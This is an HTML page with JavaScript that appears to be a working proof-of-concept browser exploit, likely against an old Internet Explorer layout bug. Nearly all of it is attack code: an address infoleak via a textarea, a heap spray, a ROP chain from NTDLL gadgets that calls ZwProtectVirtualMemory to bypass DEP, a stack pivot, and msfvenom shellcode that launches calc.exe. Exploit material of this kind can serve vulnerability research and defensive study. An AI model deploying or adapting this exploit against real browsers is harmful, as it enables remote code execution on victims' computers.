1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149 | <!DOCTYPE html>
<html>
<head>
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
var ntdllBase = "";
function infoleak() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
// Object replaced here
// one of the side allocations of the audio element
var j = document.createElement("canvas");
ctx=j.getContext("2d");
ctx.beginPath();
ctx.moveTo(20,20);
ctx.lineTo(20,100);
ctx.lineTo(70,100);
ctx.strokeStyle="red";
ctx.stroke();
}
setTimeout(function() {
var txt = document.getElementById("textarea");
var il = txt.value.substring(2,4);
var addr = parseInt(il.charCodeAt(1).toString(16) + il.charCodeAt(0).toString(16), 16);
ntdllBase = addr - 0x000d8560;
alert("NTDLL base addr is: 0x" + ntdllBase.toString(16));
spray();
boom();
}, 1000);
function writeu(base, offs) {
var res = 0;
if (base != 0) { res = base + offs }
else { res = offs }
res = res.toString(16);
while (res.length < 8) res = "0"+res;
return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
}
function spray()
{
var hso = document.createElement("div");
var junk = unescape("%u0e0e%u0e0e");
while(junk.length < 0x1000) junk += junk;
//ntdll prefered base addr = 0x77ec0000
//ROP chain built from NTDLL.DLL to disable DEP using VirtualProtect
var rop = unescape(
writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret
writeu(0, 0x12345678) + //junk to account for retn 0x0004
writeu(0, 0x0e0e0e3e) + //addr of size variable placeholder
writeu(ntdllBase, 0x26A04) + //0x77ee6a04: xor eax, eax ; ret
writeu(ntdllBase, 0xC75C6) + //0x77f875c6: add eax, 0x00001000 ; pop esi ; ret
writeu(0, 0x12345678) + //junk into esi
writeu(ntdllBase, 0x1345E) + //0x77ed345e: mov dword [ecx], eax ; mov al, 0x01 ; pop ebp ; retn 0x0008
writeu(0, 0x12345678) + //junk into ebp
writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret
writeu(0, 0x12345678) + //junk to account for retn 0x0008
writeu(0, 0x12345678) + //junk to account for retn 0x0008
writeu(0, 0x0e0e0484) + //addr of protection value placeholder
writeu(ntdllBase, 0x26A04) + //0x77ee6a04: xor eax, eax ; ret
writeu(ntdllBase, 0x57C32) + //0x77f17c32: add eax, 0x20 ; ret
writeu(ntdllBase, 0x57C32) + //0x77f17c32: add eax, 0x20 ; ret
writeu(ntdllBase, 0x1345E) + //0x77ed345e: mov dword [ecx], eax ; mov al, 0x01 ; pop ebp ; retn 0x0008
writeu(0, 0x12345678) + //junk into ebp
writeu(ntdllBase, 0x13F8) + //0x77ec13f8: ret
writeu(0, 0x12345678) + //junk to account for retn 0x0008
writeu(0, 0x12345678) + //junk to account for retn 0x0008
writeu(ntdllBase, 0x00045ae0) + //ntdll!ZwProtectVirtualMemory - ntdll = 0x00045ae0
writeu(0, 0x0e0e048c) + //return addr = shellcode addr
writeu(0, 0xffffffff) + //process handle (-1)
writeu(0, 0x0e0e0e22) + //pointer to addr of shellcode
writeu(0, 0x0e0e0e3e) + //pointer to size
writeu(0, 0x22222222) + //placeholder for PAGE_EXECUTE_READWRITE = 0x40
writeu(0, 0x0e0e0e0a) //addr to write old protection value
);
//Shellcode
//root@kali:~# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -f js_le
var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
"%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
"");
//stack pivot
var xchg = unescape(writeu(ntdllBase, 0x2D801)); //0x77eed801: xchg eax, esp ; add al, 0x00 ; pop ebp ; retn 0x0004
//first stage ROP chain to do bigger stack pivot
var pivot = unescape(
writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret
writeu(0, 0x12345678) + //junk offset for retn 0x0004
writeu(0, 0xfffff5fa) + //offset to add to ESP to get back to the ROP chain
writeu(ntdllBase, 0xC4AE7) + //x77f84ae7: add esp, ecx ; pop ebp ; retn 0x0004
writeu(0, 0x0e0e028c) //pointer to shellcode for use with ntdll!ZwProtectVirtualMemory
);
var offset = 0x7c9; //magic number - offset into heap spray to reach addr 0x0e0e0e0e
var data = junk.substring(0, 0x200) + rop + shellcode + junk.substring(0, offset - 0xd0 - 0x200 - rop.length - shellcode.length) + pivot + junk.substring(0, 0xd0-pivot.length) + xchg;
data += junk.substring(0, 0x800 - offset - xchg.length);
while(data.length < 0x80000) data += data;
for(var i = 0; i < 0x350; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (0x7fb00-2)/2);
hso.appendChild(obj);
}
}
function boom() {
document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
th1.align = "right";
}
</script>
</head>
<body onload=infoleak()>
<form id="form">
<textarea id="textarea" style="display:none" cols="80">aaaaaaaaaaaaa</textarea>
</form>
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="0" width=2000000></th>
<th class="class2" width=0><div class="class2"></div></th>
</table>
</body>
</html>
|